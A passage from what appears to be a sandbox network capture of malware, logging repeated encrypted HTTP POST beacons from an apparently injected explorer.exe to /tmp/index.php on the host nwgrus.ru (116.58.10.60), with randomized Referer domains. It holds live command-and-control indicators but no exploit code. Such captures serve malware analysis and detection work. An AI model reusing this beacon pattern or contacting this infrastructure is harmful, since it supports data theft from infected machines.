                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 196
                                                                      Host: nwgrus.ru
Sep 25, 2024 16:01:36.023788929 CEST | 196 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 2c 4b c2 e4
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu,K-f`koY0 B<zjf9OHqXH&S|C?1#25jCMaE%_
Sep 25, 2024 16:01:37.606019020 CEST | 137 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:37 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49717 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 16:01:37.620239973 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://fogsqjysaystoh.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 359
                                                                      Host: nwgrus.ru
Sep 25, 2024 16:01:37.620268106 CEST | 359 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 33 28 e8 b7
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu3(W^xuds3eLZ85KmdW7rV218UTv{49saDc#ZW "iMo FPqC(|sXz
Sep 25, 2024 16:01:39.026094913 CEST | 137 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:38 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49718 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 16:01:39.034404993 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://verasvafreecifd.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 220
                                                                      Host: nwgrus.ru
Sep 25, 2024 16:01:39.034416914 CEST | 220 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 22 20 b7 e9
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu" vAD^NXaua~-d@Z24f@T__K\2'VE7 )tw,[18.w
Sep 25, 2024 16:01:40.325072050 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:40 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49719 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 16:01:40.333619118 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://eaxyrbajkqo.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 304
                                                                      Host: nwgrus.ru
Sep 25, 2024 16:01:40.333642960 CEST | 304 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 3a 1f f8 82
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu:GIBYyNkpL:Lrpt,5\?JGQHITS3]`?5?GsaC9U,2%uoo=?jT#:%2
Sep 25, 2024 16:01:41.599371910 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:41 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49720 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 16:01:41.608059883 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://dfqwnqnvxbwcwpps.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 272
                                                                      Host: nwgrus.ru
Sep 25, 2024 16:01:41.608084917 CEST | 272 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 02 6b 2c 90 f5 76 0b 75 77 00 c8 fb
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vuw6yo?2\G*xrwEm~'QW'@)3@\[,@X1T~x2fVBI<gcTT>J:2A7$
Sep 25, 2024 16:01:42.873982906 CEST | 137 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:42 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.5 | 49721 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 16:01:42.888470888 CEST | 282 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ovvofxjtrlcblbe.com/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 174
                                                                      Host: nwgrus.ru
Sep 25, 2024 16:01:42.888525009 CEST | 174 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 03 6b 2c 90 f5 76 0b 75 33 35 cf fd
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu35z^S>Rf5OA9u\^u7]_c>GqD,=c'6Fjz
Sep 25, 2024 16:01:44.128271103 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:43 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.5 | 49722 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Sep 25, 2024 16:01:44.136698008 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://khaxmqmrelincl.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 201
                                                                      Host: nwgrus.ru
Sep 25, 2024 16:01:44.136732101 CEST | 201 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 00 6b 2c 90 f5 76 0b 75 20 32 de eb
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu 2N,dLRguz(y6h1>BD5K0.&JD{CU#Nm:z`B4Q
Sep 25, 2024 16:01:45.386388063 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:45 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      12 | 192.168.2.5 | 49723 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:01:45.519504070 CEST | 283 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://tuivtdfccoxjstqv.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 184
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:45.519610882 CEST | 184 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 01 6b 2c 90 f5 76 0b 75 4f 4a fe f0
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vuOJN5`cdA2[H<xKj@gA/8UmI>1Sj]8$.a&,
                                                                      Sep 25, 2024 16:01:46.758783102 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:46 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      13 | 192.168.2.5 | 49724 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:01:46.769692898 CEST | 281 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://ktflshoikbglbj.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 136
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:46.769721985 CEST | 136 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 06 6b 2c 90 f5 76 0b 75 30 07 ca 97
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu0[Okbvv&$Y_vkv4y
                                                                      Sep 25, 2024 16:01:48.049710035 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:47 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      14 | 192.168.2.5 | 49725 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:01:48.060842991 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://xapousftkgr.net/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 198
                                                                      Host: nwgrus.ru
                                                                      Sep 25, 2024 16:01:48.060877085 CEST | 198 | OUT | Data Raw: 3b 6e 22 10 f7 be 1b 27 d8 ae b5 01 75 06 0f cb 78 7f ce e0 69 06 91 12 0c 78 7f 91 44 b3 c2 1e 9f 2d ce 28 06 1d 2b 19 eb 9d 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 07 6b 2c 90 f5 76 0b 75 2b 54 a8 ea
                                                                      Data Ascii: ;n"'uxixD-(+?#1|J7 M@NA -[k,vu+TW0yRDH*EoSvf7N(S.y^!nw( ~{KTQKO^zIu]
                                                                      Sep 25, 2024 16:01:49.324126959 CEST | 484 | IN | HTTP/1.1 404 Not Found
                                                                      Server: nginx/1.26.0
                                                                      Date: Wed, 25 Sep 2024 14:01:49 GMT
                                                                      Content-Type: text/html; charset=utf-8
                                                                      Connection: close
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      15 | 192.168.2.5 | 49726 | 116.58.10.60 | 80 | 1028 | C:\Windows\explorer.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      Sep 25, 2024 16:01:49.339158058 CEST | 278 | OUT | POST /tmp/index.php HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Accept: */*
                                                                      Referer: http://xhvcwlrrfnr.org/
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                      Content-Length: 279
                                                                      Host: nwgrus.ru
